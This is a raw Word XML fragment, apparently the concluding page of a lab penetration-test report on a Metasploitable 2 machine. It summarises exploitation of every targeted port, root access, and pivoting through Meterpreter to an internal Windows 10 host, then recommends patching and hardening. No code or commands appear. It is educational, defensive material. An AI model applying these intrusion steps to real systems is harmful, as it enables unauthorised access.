        <w:spacing w:before="427" w:after="0" w:line="321" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial Black" w:eastAsia="Arial Black"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:color w:val="#000000"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-191"/>
          <w:noProof/>
        </w:rPr>
      </w:pP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30"/>
          <w:noProof/>
        </w:rPr>
        <w:t>CCcccc7.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial Black" w:eastAsia="Arial Black"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:color w:val="#FFFFFF"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-13"/>
          <w:noProof/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial Black" w:eastAsia="Arial Black"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:color w:val="#000000"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-20"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Conclusion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1" coordorigin="2612,1829" coordsize="1743,370" o:spt="12" path="m2612,2199l4355,2199l4355,1829l2612,1829x">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 71" type="Shape 71" style="position:absolute;left:0;text-align:left;margin-left:129.61pt;width:89.14pt;height:20.48pt;mso-position-horizontal-relative:page;margin-top:18pt;mso-position-vertical-relative:paragraph;z-index:-251657495" filled="t" fillcolor="#00FFFF" stroked="f">
            <v:fill type="solid"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="427" w:after="0" w:line="321" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial Black" w:eastAsia="Arial Black"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:color w:val="#000000"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-191"/>
          <w:noProof/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="621" w:right="720" w:bottom="481" w:left="720" w:header="0" w:footer="0" w:gutter="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="285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0" coordorigin="1052,2199" coordsize="10141,19" o:spt="12" path="m1052,2208l11193,2208">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 90" type="Shape 90" style="position:absolute;left:0;text-align:left;margin-left:51.58pt;width:509.07pt;height:2.96pt;mso-position-horizontal-relative:page;margin-top:-1pt;mso-position-vertical-relative:paragraph;z-index:3818" filled="f" stroked="t" strokeweight="0.96pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="180" w:after="0" w:line="255" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="360" w:right="476"/>
        <w:jc w:val="left"/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This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engagement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demonstrated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that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Metasploitable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2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machine,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while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intentionally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vulnerable,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represents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realistic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model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of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neglected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or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legacy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system.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Every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targeted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was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successfully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exploited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within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short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timeframe,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="-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ultimately</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"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resulting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root-level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access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"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-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Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="-7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bridge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-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Meterpreter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foothold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internal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Windows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10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endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="226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</w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="196" w:after="0" w:line="250" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="360" w:right="369"/>
        <w:jc w:val="left"/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most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critical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takeaways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from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this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assessment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are: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(1)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unpatched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software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with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known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CVEs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provides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trivial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entry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points,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(2)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default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credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="-5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are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exploited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seconds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by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automated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tools,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(3)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="4" w:after="0" w:line="250" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="360" w:right="280"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="-6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once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an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attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="-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gains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foothold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on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bridge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host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segmented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network,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pivoting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to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internal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systems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requires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minimal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additional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effort.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="406" w:after="0" w:line="255" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="360" w:right="557"/>
        <w:jc w:val="left"/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</w:pP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Implementing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remediation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recommendations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outlined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Section</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="8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73"/>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="61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particularly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patch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management,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credential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hardening,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firewall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rules,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service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="4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6"/>
          <w:noProof/>
        </w:rPr>
        <w:t>minimisation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="66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would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eliminate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all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vulnerabilities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identified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in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this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report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significantly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raise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the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cost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and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="-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0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>complexity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of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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="-2"/>
          <w:noProof/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>real-world </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>attack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="3765"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial Black" w:eastAsia="Arial Black"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:color w:val="#1B3A5C"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-157"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="264" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="3765"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial Black" w:eastAsia="Arial Black"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:color w:val="#1B3A5C"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-15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52" coordorigin="1090,7005" coordsize="9363,1066" o:spt="12" path="m1090,7005l10453,7005l10453,8071l1090,8071">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 952" type="Shape 952" style="position:absolute;left:0;text-align:left;margin-left:53.50pt;width:470.17pt;height:55.30pt;mso-position-horizontal-relative:page;margin-top:11pt;mso-position-vertical-relative:paragraph;z-index:-251657493" filled="t" fillcolor="#E8F4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2" coordorigin="1080,6986" coordsize="19,1085" o:spt="12" path="m1090,6986l1090,8071">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 1052" type="Shape 1052" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:2.96pt;height:56.26pt;mso-position-horizontal-relative:page;margin-top:10pt;mso-position-vertical-relative:paragraph;z-index:3822" filled="f" stroked="t" strokeweight="0.96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3" coordorigin="1100,6986" coordsize="9344,19" o:spt="12" path="m1100,6996l10444,6996">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 1053" type="Shape 1053" style="position:absolute;left:0;text-align:left;margin-left:53.98pt;width:469.21pt;height:2.96pt;mso-position-horizontal-relative:page;margin-top:10pt;mso-position-vertical-relative:paragraph;z-index:3824" filled="f" stroked="t" strokeweight="0.96pt" strokecolor="#00B4D8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4" coordorigin="10444,6986" coordsize="19,1085" o:spt="12" path="m10453,6986l10453,8071">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 1054" type="Shape 1054" style="position:absolute;left:0;text-align:left;margin-left:521.19pt;width:2.96pt;height:56.26pt;mso-position-horizontal-relative:page;margin-top:10pt;mso-position-vertical-relative:paragraph;z-index:3826" filled="f" stroked="t" strokeweight="0.96pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="3765"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial Black" w:eastAsia="Arial Black"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:color w:val="#1B3A5C"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-157"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial Black" w:eastAsia="Arial Black"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:color w:val="#1B3A5C"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-20"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Assessment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial Black" w:eastAsia="Arial Black"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:color w:val="#1B3A5C"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-12"/>
          <w:noProof/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial Black" w:eastAsia="Arial Black"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:color w:val="#1B3A5C"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-20"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Complete</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4468"/>
          <w:tab w:val="left" w:pos="4646"/>
        </w:tabs>
        <w:spacing w:before="104" w:after="0" w:line="201" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="908"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="#4A5568"/>
          <w:i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4A5568"/>
          <w:i/>
          <w:spacing w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>All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0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="#4A5568"/>
          <w:i/>
          <w:spacing w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="#4A5568"/>
          <w:i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ports</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="#4A5568"/>
          <w:i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successfully</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="#4A5568"/>
          <w:i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exploited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ab/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•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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="#4A5568"/>
          <w:i/>
          <w:spacing w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Pivoting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0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>demonstrated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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="#4A5568"/>
          <w:i/>
          <w:spacing w:val="-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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="#4A5568"/>
          <w:i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internal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="#4A5568"/>
          <w:i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A5568"/>
          <w:i/>
          <w:spacing w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>network</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial Black" w:eastAsia="Arial Black"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:color w:val="#4A5568"/>
          <w:i/>
          <w:spacing w:val="-93"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="364" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="-6960"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial Black" w:eastAsia="Arial Black"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:color w:val="#4A5568"/>
          <w:i/>
          <w:spacing w:val="-9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5" coordorigin="1100,8071" coordsize="9344,19" o:spt="12" path="m1100,8081l10444,8081">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 1055" type="Shape 1055" style="position:absolute;left:0;text-align:left;margin-left:53.98pt;width:469.21pt;height:2.96pt;mso-position-horizontal-relative:page;margin-top:2pt;mso-position-vertical-relative:paragraph;z-index:3832" filled="f" stroked="t" strokeweight="0.96pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="182" w:after="0" w:line="182" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="-20"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial Black" w:eastAsia="Arial Black"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:color w:val="#4A5568"/>
          <w:i/>
          <w:spacing w:val="-93"/>
          <w:noProof/>
        </w:rPr>
      </w:pP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This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8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report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11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7"/>
          <w:noProof/>
        </w:rPr>
        <w:t>was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8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produced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13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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>in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9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14"/>
          <w:noProof/>
        </w:rPr>
        <w:t>a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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>controlled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4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lab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9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environment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11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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>for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11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2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>educational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15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20"/>
          <w:noProof/>
        </w:rPr>
        <w:t>purposes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8"/>
          <w:noProof/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial Black" w:eastAsia="Arial Black"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:color w:val="#4A5568"/>
          <w:i/>
          <w:spacing w:val="-19"/>
          <w:noProof/>
        </w:rPr>
        <w:t>only.</w:t>
      </w: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0" w:after="0" w:line="221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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="182" w:after="0" w:line="182" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="0"/>
        <w:jc w:val="center"/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</w:pP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Page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:color w:val="#4A5568"/>
          <w:spacing w:val="-3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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:color w:val="#4A5568"/>
          <w:spacing w:val="2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of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:color w:val="#4A5568"/>
          <w:spacing w:val="5"/>
          <w:noProof/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:color w:val="#4A5568"/>
          <w:spacing w:val="-2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>26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52,14923" coordsize="10141,10" o:spt="12" path="m1052,14928l11193,14928">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 57" type="Shape 57" style="position:absolute;left:0;text-align:left;margin-left:51.58pt;width:509.07pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:7pt;mso-position-vertical-relative:paragraph;z-index:3815" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:type w:val="continuous"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="621" w:right="720" w:bottom="481" w:left="720" w:header="0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vQLC" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/IMG_Image96_hES1H2SpK2E0DVkGjhv52C10SyygejyM.PNG"/>
	<Relationship Id="rId_Vzmc" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/IMG_Image104_Cliped_Xw4L9nMqJbFUlji8Ftxe3PksoAegwZxT.PNG"/>
	<Relationship Id="rId_dN8z" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/IMG_Image107_Cliped_Pj76NeZlt8Mzec5Ya6GklcpxwKcEeuG1.PNG"/>
	<Relationship Id="rId_uCVT" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/IMG_Image110_Cliped_VVQIaGiHAfW9tWsjIVTPlQ6wdrgDhRlD.PNG"/>
	<Relationship Id="rId_qRZv" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/IMG_Image113_Cliped_us3l5lToJspNkCC1gvu0K128sFqwyyPq.PNG"/>
	<Relationship Id="rId_81y9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/IMG_Image120_Cliped_wWfo1SPgPy3HSOTwmlFOrVvy9JqBDeMA.PNG"/>
	<Relationship Id="rId_DOoe" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/IMG_Image123_Cliped_DfKXTPIgwyeDuxOKATqgPWQ0bHid7Y6J.PNG"/>
	<Relationship Id="rId_w4iL" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/IMG_Image126_Cliped_gUdjPXfHnsKWw2dX9keWVR1rGmLTMUR1.PNG"/>
	<Relationship Id="rId_6ywF" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/IMG_Image131_Cliped_iFowBh56BiBP0l8hJfeeZ3IvswEiJrA2.PNG"/>
	<Relationship Id="rId_rfRV" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/IMG_Image136_Cliped_c87GeIvsaHSWFd0H7P9WylFRWxyEakYB.PNG"/>
	<Relationship Id="rId_HP8C" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/IMG_Image141_Cliped_f9IGxL3ML7slKr9H7ujHdMz4XuNMC88r.PNG"/>
	<Relationship Id="rId_qBAC" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/IMG_Image146_Cliped_nz12MpecjUwW2Xxv7QLZE7ECxkQFMtC7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2026-05-19T18:47:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-19T18:47:03Z</dcterms:modified>
</cp:coreProperties>
</file>